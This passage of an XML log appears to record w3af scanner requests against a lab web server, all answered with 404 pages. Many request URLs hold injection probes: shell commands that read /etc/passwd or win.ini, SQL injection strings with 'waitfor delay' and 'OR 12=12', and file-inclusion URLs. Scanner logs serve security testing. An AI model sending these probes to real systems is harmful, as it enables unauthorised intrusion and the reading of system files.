                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="274">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="276">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="277">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="278">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="280">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="794">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="283">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="285">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="800">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="805">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/yzzLwGYZ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="295">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/4nV4dSKX HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="811">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12%27+OR+%2712%27%3D%2712 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="307">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="308">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="310">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="314">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="315">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="316">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="318">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
